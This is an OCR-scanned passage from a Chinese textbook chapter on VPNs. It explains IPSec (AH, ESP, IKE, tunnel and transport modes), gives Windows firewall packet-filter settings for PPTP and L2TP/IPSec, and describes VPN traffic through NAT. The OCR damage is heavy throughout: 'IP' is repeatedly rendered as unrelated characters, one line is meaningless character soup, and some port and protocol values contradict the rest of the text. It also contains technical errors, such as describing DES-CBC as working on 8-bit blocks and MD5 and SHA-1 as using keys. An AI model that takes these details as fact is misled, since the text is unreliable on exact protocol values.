过 过 滤 后 的 数据 通过 唯一 的 入 口传 到 VPN 服务 器 ，VPN 服务 器 再 根据 安全 策略 进一步 
过 滤 。 

外 部 网 VPN 并 不 假定 连接 的 公司 双方 之 间 存 在 的 双向 信任 关系 。 外 部 网 VPN 在 
Internet 内 打开 一 条 隧道 ， 并 保证 经 过 过 滤 后 的 信息 传输 的 安全 。 当 公司 将 很 多 商业 活动 安 
排 在 公共 网 络 上 进行 时 , 一 个 外 部 网 VPN 应 该 用 高 强度 的 加 密 算 法 ， 密 钥 应 选 在 128 位 以 
上 。 此 外 应 支持 多 种 认证 方案 和 加 密 算法 ， 因 为 商业 伙伴 和 顾客 可 能 有 不 同 的 网 络 结构 和 
操作 平台 。 

外 部 网 VPN 应 能 根据 尽 可 能 多 的 参数 来 控制 对 网 络 资源 的 访问 ， 参 数 包括 源 地 址 、 目 
的 地 址 、 应 用 程序 的 用 途 、 所 用 的 加 密 和 认证 类 型 、 个 人 身份 、 工 作 组 、 子 网 等 。 管 理 员 
应 能 对 个 人 身份 进行 认证 ， 而 不 是 仅仅 根据 下 地 址 。 


6.3.3 IPsec 


VPN 区 别 于 一 般 网 络 互联 的 关键 在 于 隧道 的 建立 。 数 据 包 经 过 加 密 后 ， 按 隧道 协议 进 
行 封装 、 传 送 以 保证 安全 。IPSec(IP and Security) 是 实现 虚拟 专用 网 络 的 一 种 重要 的 安全 隧 
道 协议 , 是 网 络 操作 系统 为 最 大 限度 地 保护 网 络 信 息 流量 而 使 用 的 一 种 人 P 安全 机 制 。 IPSec 
主要 用 于 不 可 靠 的 他 网 络 通信 。 

IPSec 在 人 P 层 上 对 数据 包 进 行 高 强度 的 安全 管理 ， 提 供 数据 源 验证 。 无 连接 数据 完整 
性 、 有 限 业务 流 机 密 性 等 安全 服务 。 各 种 应 用 程序 可 以 享用 IP 层 提供 的 安全 服务 和 密 钥 管 
理 ， 而 不 必 设 计 和 实现 自己 的 安全 机 制 ， 因 此 可 以 减少 密 钥 协商 的 开销 ， 也 降低 了 生产 安 
全 漏洞 的 可 能 性 。IPSec 可 连续 或 递归 应 用 ， 在 路 由 器 、 防 火 墙 、 主 机 和 通信 链 路 上 配置 ， 
实现 端 到 端 安全 、 虚 拟 专用 网 络 和 安全 隧道 技术 。 

IPSec 在 4 个 层次 上 起 作用 : 加 密 和 封装 、 验 证 和 重 放 容错 、 密 钥 管理 以 及 数字 签名 和 
数字 证 书 。IPSec 加 密 是 端 对 端的 ， 就 是 说 它 在 从 一 台 机 器 到 另 一 台 计 算 机 途中 信息 仍然 是 
加 密 的 ， 并 且 只 能 由 另 一 端的 计算 机 解密 。IPSec 同样 使 用 公 钥 加 密 技 术 , 不 同 的 是 两 端 都 
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生成 共享 密 铀 ， 而 且 共享 密 钥 不 能 在 网 络 上 传输 。 
1. IPSec 的 保护 形式 


IPSec 提供 三 种 不 同 的 形式 来 保护 通过 公有 或 私有 人 P 网 络 来 传送 的 私有 数 。 

1) 认证 

作用 是 可 以 确定 所 接受 的 数据 与 所 发 送 的 数据 是 一 致 的 ， 同 时 可 以 确定 申请 发 送 者 在 
实际 上 是 真实 发 送 者 ， 而 不 是 伪装 的 。 

2) 数据 完整 

作用 是 保证 数据 从 原 发 地 到 目的 地 的 传送 过 程 中 没有 任何 不 可 检测 的 数据 丢失 与 
改变 。 

3) 机 密 性 

作用 是 使 相应 的 接收 者 能 获取 发 送 的 真正 内 容 ， 而 无 意 获取 数据 的 接收 者 无 法 获知 数 
据 的 真正 内 容 。 

在 IPSEC 由 三 个 基本 要 素来 提供 以 上 三 种 保护 形式 : 认证 协议 头 (AH)、 安 全 加 载 封装 
(ESP) 和 互联 网 密 匙 管理 协议 IKMP)。 认证 协议 头 和 安全 加 载 封装 可 以 通过 分 开 或 组 合 使 用 
来 达到 所 希望 的 保护 等 级 。 

AH 是 在 所 有 数据 包头 加 入 一 个 密码 。 正 如 整个 名 称 所 示 ，AH 通过 一 个 只 有 密 匙 持 有 
人 才 知 道 的 “数字 签名 ”来 对 用 户 进行 认证 。 这 个 签名 是 数据 包 通过 特别 的 算法 得 出 的 独 
特 结果 ; AH 还 能 维持 数据 的 完整 性 ， 因 为 在 传输 过 程 中 无 论 多 小 的 变化 被 加 载 ， 数 据 包 
头 的 数字 签名 都 能 把 它 检测 出 来 。 不 过 由 于 AH 不 能 加 密 数据 包 所 加 载 的 内 容 ， 因 而 它 不 
保证 任何 的 机 密 性 。 两 个 最 普遍 的 AH 标准 是 MD5 和 SHA-1，MD5 使 用 最 高 到 128 位 的 
密 铀 ， 而 SHA-1 通过 最 高 到 160 位 密 钥 供 更 强 的 保护 。 

安全 加 载 封装 (ESP) 通 过 对 数据 包 的 全 部 数据 和 加 载 内 容 进 行 全 加 密 来 严格 保证 传输 
信息 的 机 密 性 ， 这 样 可 以 避免 其 他 用 户 通 过 监听 来 打开 信息 交换 的 内 容 ， 因 为 只 有 受信 任 
的 用 户 拥 有 密 钥 打开 内 容 。ESP 也 能 提供 认证 和 维持 数据 的 完整 性 。 最 主要 的 ESP 标准 是 
数据 加 密 标准 (DES)，DES 最 高 支持 56 位 的 密 铀 ， 而 3DES 使 用 三 套 密 钥 加 密 ， 那 就 相当 
于 使 用 最 高 到 168 位 的 密 钥 。 由 于 ESP 实际 上 加 密 所 有 的 数据 ， 因 而 它 比 AH 需要 更 多 的 
处 理 时 间 ， 从 而 导致 性 能 下 降 。 


2. VPN 的 加 密 算 法 说 明 


1) IPSec 认证 

IPSec 认证 包头 (AH) 是 一 个 用 于 提供 人 P 数据 报 完整 性 和 认证 的 机 制 。 完 整 性 保证 数据 
报 不 被 无 意 的 或 恶意 的 方式 改变 ， 而 认证 则 验证 数据 的 来 源 (主机 、 用 户 、 网 络 等 )。AH 本 
身 其 实 并 不 支持 任何 形式 的 加 密 ， 它 不 能 保护 通过 Internet 发 送 的 数据 的 可 信 性 。AH 只 是 
在 加 密 的 出 口 、 进 口 或 使 用 受到 当地 政府 限制 的 情况 下 可 以 提高 全 球 Internet 的 安全 性 。 当 
全 部 功能 实现 后 ， 它 将 通过 认证 人 P 包 并 且 减 少 基于 IP 欺骗 的 攻击 概率 来 提供 更 好 的 安全 
服务 。AH 使 用 的 包头 放 在 标准 的 IPv4 和 IPv6 包头 和 下 一 个 高 层 协议 帧 (如 TCP、UDP、 
ICMP 等 ) 之 间 。 

AH 协议 通过 在 整个 了 P 数据 报 中 实施 一 个 消息 文摘 计算 来 提供 完整 性 和 认证 服务 。 一 
个 消息 文摘 就 是 一 个 特定 的 单 向 数据 函数 ， 它 能 够 创建 数据 报 的 唯一 的 数字 指纹 。 消 息 文 
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摘 算法 的 输出 结果 放 到 AH 包头 的 认证 数据 (Authentication_Data) 区 。 消 息 文摘 5 算法 (MD5) 
是 一 个 单 向 数学 函数 。 当 应 用 到 分 组 数据 中 时 ， 它 将 整个 数据 分 割 成 若干 个 128 比特 的 信 
息 分 组 。 每 个 128 比特 为 一 组 的 信息 是 大 分 组 数据 的 压缩 或 摘要 的 表示 。 当 以 这 种 方式 使 
用 时 ，MD5 只 提供 数字 的 完整 性 服务 。 一 个 消息 文摘 在 被 发 送 之 前 和 数据 被 接收 到 以 后 都 
可 以 根据 一 组 数据 计算 出 来 。 如 果 两 次 计算 出 来 的 文摘 值 是 一 样 的 ， 那 么 分 组 数据 在 传输 
过 程 中 就 没有 被 改变 。 这样 就 防止 了 无 意 或 恶意 的 算 改 。 在 使 用 HMAC 一 MD5 认证 过 的 数 
据 交 换 中 ， 发 送 者 使 用 以 前 交换 过 的 密 钥 来 首次 计算 数据 报 的 64 比特 分 组 的 MD5 文摘 。 
从 一 系列 的 16 比特 中 计算 出 来 的 文摘 值 被 累加 成 一 个 值 ,然后 放 到 AH 包头 的 认证 数据 区 ， 
随后 数据 报 被 发 送 给 接收 者 。 接 收 者 也 必须 知道 密 钥 值 ， 以 便 计 算出 正确 的 消息 文摘 并 且 
将 其 与 接收 到 的 认证 消息 文摘 进行 适 配 。 如 果 计算 出 的 和 接收 到 的 文摘 值 相等 ， 那 么 数据 
报 在 发 送 过 程 中 就 没有 被 改变 ， 而 且 可 以 相信 是 由 只 知道 秘密 密 钥 的 另 一 方 发 送 的 。 

2) IPsec 加 密 

封包 安全 协议 (ESP) 包 头 提供 人 P 数据 报 的 完整 性 和 可 信 性 服务 ，ESP 协议 是 设计 以 两 
种 模式 工作 的 : 隧道 (Tunneling) 模 式 和 传输 (Transporb 模 式 。 两 者 的 区 别 在 于 IP 数据 报 的 
ESP 负载 部 分 的 内 容 不 同 .在 隧道 模式 中 , 整个 人 P 数据 报 都 在 ESP 负载 中 进行 封装 和 加 密 。 
当 这 完成 以 后 ， 真 正 的 人 P 源 地 址 和 目的 地 址 都 可 以 被 隐藏 为 Internet 发 送 的 普通 数据 。 这 
种 模式 的 一 种 典型 用 法 就 是 在 防火 墙 一 防火 墙 之 间 通 过 虚拟 专用 网 的 连接 时 进行 的 主机 或 
拓扑 隐藏 。 在 传输 模式 中 ， 只 有 更 高 层 协议 帧 (TCP、UDP、ICMP 等 ) 被 放 到 加 密 后 的 下 
数据 报 的 ESP 负载 部 分 。 在 这 种 模式 中 ， 源 和 目的 下 地 址 以 及 所 有 的 IP 包头 域 都 是 不 加 
密 发 送 的 。 

IPSec 要 求 在 所 有 的 ESP 实现 中 使 用 一 个 通用 的 默认 算法 ， 即 DES 一 CBC 算法 。 美 国 
数据 加 密 标准 (DES) 是 一 个 现在 使 用 得 非常 普遍 的 加 密 算法 。 它 最 早 是 在 由 美国 政府 公布 
的 ， 最初 是 用 于 商业 应 用 。 到 现在 所 有 DES 专利 的 保护 期 都 已 经 到 期 了 ， 因 此 全 球 都 有 它 
的 免费 实现 。IPSec ESP 标准 要 求 所 有 的 ESP 实现 支持 密码 分 组 链 方式 (CBC) 的 DES 作为 
默认 的 算法 。DES 一 CBC 通过 对 组 成 一 个 完整 的 他 数据 包 (隧道 模式 ) 或 下 一 个 更 高 的 层 协 
议 帧 (传输 模式 ) 的 8 比特 数据 分 组 中 加 入 一 个 数据 函数 来 工作 。DES 一 CBC 用 8 比特 一 组 
的 加 密 数据 ( 密 文 ) 来 代替 8 比特 一 组 的 未 加 密 数 据 (明文 )。 一 个 随机 的 、8 比特 的 初始 化 向 
量 (IV) 被 用 来 加 密 第 一 个 明文 分 组 ， 以 保证 即使 在 明文 信息 开头 相同 时 也 能 保证 加 密 信息 
的 随机 性 。DES 一 CBC 主要 是 使 用 一 个 由 通信 各 方 共 享 的 相同 的 密 钥 。 正 因为 如 此 ， 它 被 
认为 是 一 个 对 称 的 密码 算法 。 接 收 方 只 有 使 用 由 发 送 者 用 来 加 密 数据 的 密 钥 才能 对 加 密 数 
据 进 行 解密 。 因 此 ，DES 一 CBC 算法 的 有 效 性 依赖 于 秘密 密 钥 的 安全 ，ESP 使 用 的 DES 一 
CBC 的 密 钥 长 度 是 56 比特 。 

IPSec 有 两 种 工作 方式 : 隧道 模式 和 传输 模式 。 在 隧道 方式 中 ， 整 个 用 户 的 卫 数据 包 
被 用 来 计算 ESP 包头， 整个 他 包 被 加 密 并 和 ESP 包头 一 起 被 封装 在 一 个 新 的 他 包 内 。 这 
样 当 数据 在 Internet 上 传送 时 ， 真 正 的 源 地 址 和 目的 地 址 被 隐藏 起 来 。 在 传输 模式 中 ， 只 有 
高 层 协议 (TCP、UDP、ICMP 等 ) 及 数据 进行 加 密 。 在 这 种 模式 下 ， 源 地 址 、 目 的 地 址 以 及 
所 有 下 包头 的 内 容 都 不 加 密 。 
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3. IPSec 的 工作 方式 


(1) 计算 机 A 通过 一 个 不 可 靠 人 P 网 络 发 送 数据 给 计算 机 B。 在 开始 传输 之 前 , 计算 机 
A 查看 是 否 应 该 依照 建立 在 A 上 的 安全 策略 保护 数据 。 安 全 策略 包含 一 些 规则 ， 可 以 确定 


通信 的 敏感 程度 。 


(2) 如 果 过 滤器 发 现 有 匹配 的 结果 ,A 首先 与 B 通 过 称 为 Intemet 密 钥 交 换 (Internet Key 
Exchange，IKE) 的 协议 开始 进行 安全 协商 。 然 后 两 台 计 算 机 依照 在 安全 规则 中 指定 的 验证 
方法 交换 凭据 。 验 证 方法 可 以 是 Kerberos、 公 和 钥 凭 据 或 者 是 预先 确定 的 密 钥 值 。 

(3) 一 旦 协商 开始 ， 在 两 台 计 算 机 之 间 会 建立 两 种 协商 协议 ， 称 为 安全 关联 (security 
association)。 第 一 种 叫 作 Phase I IKE SA,， 它 指定 了 两 台 计 算 机 将 如 何 彼此 信任 。 第 二 种 是 
关于 两 台 计算 机 如 何 保护 应 用 程序 通信 的 协议 ， 叫 作 Phase II IPSec Sec Sas， 它 指定 了 安 
全 方法 和 各 方向 通信 的 密 钥 。IKE 为 每 个 SA 自动 创建 并 刷新 共享 秘密 密 钥 。 秘 密 密 钥 分 
别 在 网 络 两 端 创建 ， 不 会 在 网 络 中 传输 。 

(4) 为 了 保证 信息 的 完整 性 ， 计 算 机 A 对 发 出 的 数据 包 签名 ， 并 且 依照 双方 协商 好 的 
方法 加 密 或 不 加 密 数 据 包 。 然 后 将 数据 包 传送 到 B。 

(5) 计算 机 B 查看 数据 包 的 完整 性 , 如 有 需要 则 将 其 解密 。 然 后 数据 沿 着 卫 堆栈 向 上 
传送 到 通常 的 应 用 程序 中 。 


4. IPSec 的 三 


个 特点 


(1) 原来 的 局 域 网 机 构 彻底 透明 。 透 明 表 现 为 三 方面 : 系统 不 占用 原 网 络 系统 中 任何 
全 地 址 : 装 入 VPN 系统 后 , 原来 的 网 络 系统 不 需要 改变 任何 配置 ; 原 有 的 网 络 不 知道 自己 
与 外 界 的 信息 传递 已 受到 了 加 密 保护 ， 该 特点 不 仅 能 够 为 安装 调试 提供 方便 ， 也 能 够 保护 
系统 自身 不 受 外 来 网 络 的 攻击 。 

(2) IPSec 内 部 实现 与 他 实现 融 为 一 体 、 优 化 设计 ， 具 有 很 高 的 运行 效率 。 

(3) 安装 VPN 的 平台 通常 采用 安全 操作 系统 内 核 并 以 嵌入 的 方式 固化 ， 具 有 无 漏洞 、 
抗 病毒 、 抗 攻击 等 安全 防范 性 能 。 

作为 网 络 层 的 安全 标准 ，IPSec 一 经 提出 ， 就 引起 了 计算 机 网 络 界 的 关注 ， 很 多 计算 机 
网 络 公司 的 产品 都 宣布 支持 这 个 标准 ， 并 且 不 断 推出 新 的 产品 。 但 由 于 标准 提出 时 间 短 ， 
因此 尽管 产品 种 类 很 多 ， 真 正 合格 的 产品 却 很 少 。 


6.3.4 VPN 综合 应 用 


1. VPN 与 Windows 防火 墙 


防火 墙 可 以 有 


来 进行 报 文 过 滤 ， 以 便 允 许 或 者 拒绝 那些 非常 特殊 的 网 络 流量 流通 。IP 


报 文 过 滤 功 能 能 够 为 用 户 提供 一 种 方法 ， 用 来 精确 地 定义 什么 类 型 的 人 P 流量 允许 通过 防 


火 墙 。 


可 以 有 两 种 方法 在 VPN 服务 器 上 使 用 防火 墙 。 

(1) VPN 服务 器 在 Intemet 上 ， 而 防火 墙 位 于 VPN 服务 器 与 内 部 网 之 间 。 

(2) 防火 墙 在 Internet 上 ，VPN 服务 器 位 于 防火 墙 与 内 部 网 之 间 。 

1) ”VPN 服务 器 位 于 防火 墙 之 前 

VPN 服务 器 位 于 防火 墙 之 前 连接 到 Intemet 上 , 用 户 就 必须 在 Internet 接口 上 添加 一 个 
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一 潼 洲 营 煌 半 ”过 六 芭 襄 睹 负 到 沼 了 对 


Q 


报 过 滤器 ， 只 允许 那些 到 达 或 者 来 自 Internet VPN 服务 器 接口 卫 地 址 的 VPN 流量 流动 。 

对 于 输入 流量 , 隧道 数据 被 VPN 服务 器 解密 之 后 将 被 转发 给 防火 墙 ， 防 火 墙 再 利用 过 
滤器 允许 流量 转发 给 内 部 网 中 的 资源 。 由 于 在 VPN 服务 器 上 通过 的 流量 仅仅 是 被 已 验证 
VPN 客户 所 产生 的 流量 ， 所 以 在 这 个 过 程 中 执行 的 防火 墙 过 滤 功能 ， 可 以 用 来 防止 VPN 
用 户 访问 某 些 特定 的 内 部 网 资源 。 
因为 允许 在 内 部 网 中 通过 因特网 流量 必须 经 过 VPN 服务 器 , 因此 这 个 过 程 也 会 阻止 非 
VPN Internet 用 户 对 FTP( 文 件 传输 协议 ) 或 者 Web 内 部 网 资源 的 共享 。 

对 于 VPN 服务 器 上 的 Internet 接口 ， 用 户 可 以 使 用 Routing and Remote Access 插件 配 
置 下 列 的 输入 过 滤器 与 输出 过 滤器 。 

(1) PPTP 报 文 过 滤器 。 

可 以 按照 以 下 方法 ， 配 置 一 个 过 滤器 动作 设置 为 Drop all packets except those that meet 
the criteria below 的 输入 过 滤器 。 

@ 目标 也 地址 是 VPN 服务 器 Internet 接口 地 址 ， 子 网 掩 码 为 255.255.255.255,，TCP 
目标 端口 为 1723(0x06BB)。 这 个 过 滤器 允许 进行 从 PPTP 客户 到 PPTP 服务 器 的 PPTP 
隧道 维护 流量 的 流通 。 

@ 目标 了 P 地 址 是 VPN 服务 器 Internet 接口 地 址 ， 子 网 掩 码 为 255.255.255.255，IP 
协议 ID 为 47(0x2F)。 这 个 过 滤器 允许 从 PPTP 客户 到 达 PPTP 服务 器 的 OPPTP 隧道 数 
据 流 通 。 

图 目标 他 地 址 是 VPN 服务 器 Internet 接口 地 址 ， 子 网 掩 码 为 255.255.255.255,，TCP 
目标 端口 为 1723(0x06BB)。 这 个 过 滤器 只 有 当 VPN 服务 器 充当 路 由 器 到 路 由 器 VPN 连接 
中 的 VPN 客户 (呼叫 方 路 由 器 ) 时 才 必 需 。 如 果 用 户 选 择 了 TCP[established]， 那 么 只 有 当 
VPN 服务 器 初始 化 了 TCP 连接 时 才 接 收 流量 。 

可 以 按照 以 下 方法 ， 配 置 一 个 过 滤器 动作 设置 为 Drop all packets except those that meet 
the criteria below 的 输出 过 滤器 。 

@ 源 了 地 址 是 VPN 服务 器 Intermet 接口 地 址 ， 子 网 掩 码 为 255.255.255.255，TCP 
源 端口 为 1723(0x06BB)。 这 个 过 滤器 允许 进行 从 PPTP 服务 器 到 PPTP 客户 的 PPTP 隧道 维 
护 流量 的 流通 。 

@ 源 他 地 址 是 VPN 服务 器 Intemet 接口 地 址 , 子 网 掩 码 为 255.255.255.255, IP 协议 
ID 为 47(0x2F)。 这 个 过 滤器 允许 从 PPTP 服务 器 到 达 PPTP 客户 的 PPTP 隧道 数据 流通 。 

图 源 了 他 地址 是 VPN 服务 器 Internet 接口 地 址 ， 子 网 掩 码 为 255.255.255.255，TCP 
源 端口 为 1723(0x06BB)。 这 个 过 滤器 只 有 当 VPN 服务 器 充当 路 由 器 到 路 由 器 VPN 连接 中 
的 VPN 客户 (呼叫 方 路 由 器 ) 时 才 必 需 。 如果 用 户 选择 了 TCP[established], 那么 只 有 当 VPN 
服务 器 初始 化 了 TCP 连接 时 才 接收 流量 。 

(2) IPSec L2TP 报 文 过 滤器 。 

可 以 按照 以 下 方法 ， 配 置 一 个 过 滤器 动作 设置 为 Drop all packets except those that meet 
the criteria below 的 输入 过 滤器 。 

@ 目标 下 地 址 是 VPN 服务 器 Intemet 接口 地 址 , 子 网 掩 码 是 255.255.255.255, UDP 
目标 端口 为 500(0x01F4)。 这 个 过 滤器 允许 到 达 VPN 服务 器 的 IKE(Internet Key Exchange， 
网 际 密 钥 交换 ) 流 量 流通 。 

@ 目标 他 地 址 是 VPN 服务 器 Intemet 接口 地 址 , 子 网 掩 码 是 255.255.255.255, UDP 
目标 端口 为 1701(0x6A5)。 这 个 过 滤器 允许 从 VPN 客户 到 VPN 服务 器 的 L2TP 隧道 数据 
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用 户 可 以 按照 以 下 方法 ， 配 置 一 个 过 滤器 动作 被 设置 为 Drop all packets except those 
that meet the criteria below 的 输出 过 滤器 。 

@ 源 了 "地 址 是 VPN 服务 器 Internet 接口 地 址 ， 子 网 掩 码 是 255.255.255.255,，UDP 
源 端口 为 500(0x01F4)。 这 个 过 滤器 允许 来 自 VPN 服务 器 的 IKE 流量 流通 。 

@ 源 卫 地址 是 VPN 服务 器 Intemet 接口 地 址 ， 子 网 掩 码 是 255.255.255.255，UDP 
源 端 口 为 1701(0x6A5)。 这 个 过 滤器 允许 从 VPN 服务 器 到 VPN 客户 的 L2TP 隧道 数据 流通 。 

对 于 下 协议 50 的 IPsec ESP 流量 ， 不 需要 有 任何 过 滤器 。 在 IPSec 模块 的 TCP/IP 删 
除了 ESP 头 之 后 ，Routing and Remote Access 服务 过 滤器 就 自动 发 生 作 用 。 

2) ”VPN 服务 器 位 于 防火 墙 之 后 

在 更 为 常见 的 配置 方式 中 ， 防 火 墙 是 直接 连接 到 Internet 上 ， 而 VPN 服务 器 则 是 连接 
到 DMZ(Demilitarized Zone， 非 敏感 区 ) 的 另 一 个 内 部 网 资源 。DMZ 是 一 个 他 网关 , 通常 
包含 有 Intemet 用 户 可 以 访问 的 网 络 资源 (如 Web 服务 器 与 FTP 服务 器 )。VPN 服务 器 在 
DMZ 上 有 一 个 接口 ， 而 且 在 内 部 网 上 也 有 一 个 接口 。 

在 这 种 方式 中 , 防火 墙 必须 在 它 的 Internet 接口 上 配置 有 输入 过 滤器 和 输出 过 滤器 , 用 
来 允许 到 达 VPN 服务 器 的 隧道 维护 流量 与 隧道 数据 通过 。 其 他 的 过 滤器 可 以 用 来 允许 
到 达 Web 服务 器 、FTP 服务 器 以 及 DMZ 上 其 他 类 型 服务 流量 的 流通 。 
因为 防火 墙 没 有 为 每 一 个 VPN 连接 提供 单独 的 密 钥 , 它 只 能 对 隧道 数据 的 明文 头 部 进 
行 过 滤 ， 也 就 是 说 所 有 的 隧道 数据 都 是 可 以 通过 防火 墙 。 但 是 ， 这 并 不 是 一 种 安全 的 通信 
方法 ， 因 此 VPN 连接 需要 有 一 个 验证 过 程 用 来 阻止 对 VPN 服务 器 的 未 授权 访问 。 
对 于 防火 墙 上 的 Internet 接口 , 必须 使 用 防火 墙 配置 软件 对 下 列 输入 过 滤器 或 者 输出 过 
滤器 进行 配置 。 
(1) PPTP 报 文 过 滤器 。 
可 以 按照 以 下 方法 , 配置 一 个 过 滤器 动作 , 将 其 设置 为 Drop all packets except those that 
meet the criteria below 的 输入 过 滤器 。 

@ 目标 人 P 地 址 是 VPN 服务 器 DMZ 接口 地 址 ，TCP 目标 端口 为 1723(0x06BB)。 这 
个 过 滤器 允许 进行 从 PPTP 客户 到 PPTP 服务 器 的 PPTP 隧道 维护 流量 的 流通 。 

@ 目标 人 P 地 址 是 VPN 服务 器 DMZ 接口 地 址 ， 卫 协议 ID 为 47(0x2F)。 这 个 过 滤器 
允许 从 PPTP 客户 到 达 PPTP 服务 器 的 OPPTP 隧道 数据 流通 。 

@ 目标 他 地 址 是 VPN 服务 器 DMZ 接口 地 址 ，TCP 目标 端口 为 1723(0x06BB)。 这 
个 过 滤器 只 有 当 VPN 服务 器 充当 路 由 器 到 路 由 器 VPN 连接 中 的 VPN 客户 (呼叫 方 路 由 器 ) 
时 才 必 需 。 如 果 用 户 选 择 了 TCP[established]， 那 么 只 有 当 VPN 服务 器 初始 化 了 TCP 连接 
时 才 接 受 流量 。 

可 以 按照 以 下 方法 ， 配 置 一 个 过 滤器 动作 设置 为 Drop all packets except those that meet 
the criteria below 的 输出 过 滤器 。 

@ 源 轩 地址 是 VPN 服务 器 DMZ 接口 地 址 ，TCP 目标 端口 为 1723(0x06BB)。 这 个 
过 滤器 允许 进行 从 VPN 服务 器 到 VPN 客户 的 PPTP 隧道 维护 流量 的 流通 。 

@@ 源 中 地 址 是 VPN 服务 器 DMZ 接口 地 址 ， 卫 协议 ID 为 47(0x2F)。 这 个 过 滤器 多 
许 从 VPN 服务 器 到 达 VPN 客户 的 PPTP 隧道 数据 流通 。 

图 源 耳 地址 是 VPN 服务 器 DMZ 接口 地 址 ，TCP 源 端 口 为 1723(0x06BB)。 这 个 过 
滤器 只 有 当 VPN 服务 器 充当 路 由 器 到 路 由 器 VPN 连接 中 的 VPN 客户 (呼叫 方 路 由 器 ) 时 才 
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必需 。 如 果 用 户 选择 了 TCP[established]， 那 么 只 有 当 VPN 服务 器 初始 化 了 TCP 连接 时 才 
接受 流量 。 

(2) IPSec L2TP 报 文 过 滤器 。 

可 以 按照 以 下 方法 ， 配 置 一 个 过 滤器 动作 设置 为 Drop all packets except those that meet 
the criteria below 的 输入 过 滤器 。 

@ 目标 卫 地址 是 VPN 服务 器 DMZ 接口 地 址 ，UDP 目标 端口 为 500(0x01F4)。 这 个 
过 滤器 允许 到 达 VPN 服务 器 的 区 E( 网 际 密 钥 交换 ) 流 量 流通 。 

@ 目标 卫 地 址 是 VPN 服务 器 DMZ 接口 地 址 ， 卫 协议 ID 为 50(0x32)。 这 个 过 滤器 
允许 从 VPN 客户 到 VPN 服务 器 的 IPSecESP 隧道 数据 流通 。 

可 以 按照 以 下 方法 ， 配 置 一 个 过 滤器 动作 被 设置 为 Drop all packets except those that 
meet the criteria below 的 输出 过 滤器 。 

Q@@ 源 全 地址 是 VPN 服务 器 DMZ 接口 地 址 ，IP 协议 功 为 500(0x01F4)。 这 个 过 滤 
器 允许 来 自 VPN 服务 器 的 IKE 的 流量 流通 。 

@ 源 卫 地 址 是 VPN 服务 器 DMZ 接口 地 址 ， 卫 协议 ID 为 30(0x32)。 这 个 过 滤器 允 
许 从 VPN 服务 器 到 VPN 客户 的 IPSec ESP 隧道 数据 流通 。 

在 UDP 端口 1701 上 不 需要 为 L2TP 流量 提供 过 滤器 。 在 防火 墙 上 , 所 有 L2TP 流量 ( 包 
括 隧道 维护 信息 与 隧道 数据 ) 都 是 作为 IPSec ESP 有 效 载 荷 进 行 加 密 处 理 的 。 


2. VPN 与 网 络 地 址 翻译 器 


NAT(Network Address _ Transfer， 网 络 地 址 翻译 器 ) 是 一 0 IP 地址 与 
TCP/UDP 端口 号 进行 翻译 能 力 的 IP 路 由 器 。 现 在 假设 有 一 个 公司 希望 将 多 台 计 算 机 连接 
到 互联 网 上 。 

一 般 情况 下 ， 网 关 必须 为 每 台 计算 机 在 网 络 上 获取 一 个 公共 地 址 。 但 是 利用 NAT， 那 
么 它 就 可 以 不 需要 有 多 个 公共 地 址 。 它 可 以 在 小 型 商务 网 上 使 用 专用 地 址 ， 然 后 利用 NAT 
将 专用 地 址 映射 到 ISP(Internet Service Provider, 互联 网 服务 提供 商 ) 所 分 配 的 一 个 或 者 多 个 
了 P 地 址 上 。 

例如 ， 某 公司 在 它 的 专用 网 内 部 使 用 网 络 地 址 10.0.0.0/8， 并 且 某 个 ISP 为 它 分 配 了 一 

个 公共 人 P 地 址 ab.c.d， 那 么 NAT 就 可 以 静态 或 者 动态 地 将 所 有 专用 网 络 10.0.0.0/8 的 卫 
地 址 映射 到 下 地 址 a.b.c.d 上 。 

对 于 输出 报 文 ， 源 他 地 址 与 TCP/IP 端口 号 被 映射 到 a.b.c.d， 以 及 一 个 可 能 改变 了 的 
TCP/UDP 端口 号 上 。 对 于 输入 报 文 ， 目 标 人 P 地 址 与 TCP/UDP 端口 号 被 映射 到 专用 卫 地 
址 以 及 一 个 原始 TCP/UDP 端口 号 上 。 

默认 情况 下 ，NAT 将 对 PP 地 址 与 TCP/UDP 端口 号 进行 翻译 。 如 果 人 P 地 址 与 端 信息 
仅仅 在 人 头 与 TCP/UDP 头 总 ， 那 么 这 个 应 用 协议 将 会 被 透明 地 翻译 。 例 如 ， 在 万 维 网 
WWW 上 对 超 文本 传输 协议 HITP 流量 进行 翻译 。 

但 是 ， 有 些 应 用 协议 在 它们 的 头 中 存储 人 P 地 址 或 者 TCP/UDP 端口 信息 。 例 如 ，FTP 
就 是 在 FTP 头 中 存储 下 地址。 如果 NAT 不 能 正确 地 翻译 FTP 头 中 的 IP 地址， 那么 就 有 
可 能 导致 连接 错误 。 此 外 ， 有 些 协议 并 不 使 用 TCP 头 或 者 UDP 头 ， 而 是 在 其 他 的 头 中 使 
用 某 些 域 来 标识 数据 流 。 

如 果 NAT 组 件 必须 翻译 或 者 调整 了 头 、TCP 头 或 UDP 头 中 的 有 效 载 荷 ， 那 么 就 必须 
使 用 NAT 编辑 器 。NAT 编辑 器 可 以 正确 地 修改 那些 不 可 翻译 的 有 效 载荷 ， 以 便 使 它们 能 
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够 在 NAT 上 顺利 通过 。 

VPN 流量 的 地 址 映射 与 端口 映射 为 了 能 够 保证 PPTP 隧道 与 IPSec L2TP 隧道 在 NAT 
上 正确 地 工作 ，NAT 必须 能 够 将 多 个 数据 流 映 射 到 单独 的 他 地 址 上 ， 也 要 从 单独 的 他 地 
址 映射 到 多 个 数据 流 。 

1) PPTP 流量 

PPTP 流量 中 包括 进行 隧道 维护 的 TCP 连接 以 及 隧道 数据 GRE 封装 结果 。TCP 连接 方 
式 可 以 被 NAT 翻译 ， 这 是 因为 源 TCP 端口 号 可 以 被 透明 地 翻译 。 但 是 ，GRE 的 封装 数据 
在 没有 NAT 编辑 器 支持 的 情况 下 不 能 被 NAT 翻译。 对 隧道 数据 ,隧道 可 以 由 源 他 地 址 与 
GRE 头 中 的 Call ID 域 进行 标识 。 如 果 在 NAT 隧道 的 专用 网 络 端 存在 多 个 PPTP 客户 都 要 
与 相同 的 PPTP 服务 器 建立 隧道 , 那么 这 些 所 有 的 隧道 流量 就 具有 相同 的 源 卫 地 址 。 同 时 ， 
由 于 PPTP 客户 并 不 知道 它们 已 经 被 翻译 , 所 以 就 有 可 能 在 建立 PPTP 隧道 的 过 程 中 使 用 相 
同 的 Call ID。 这 就 有 可 能 出 现 这 样 的 情况 : 来 自 NAT 专用 网 络 端 多 个 PPTP 客户 的 隧道 数 
据 ， 在 翻译 时 具有 相同 的 源 他 地 址 与 相同 的 Call ID 。 

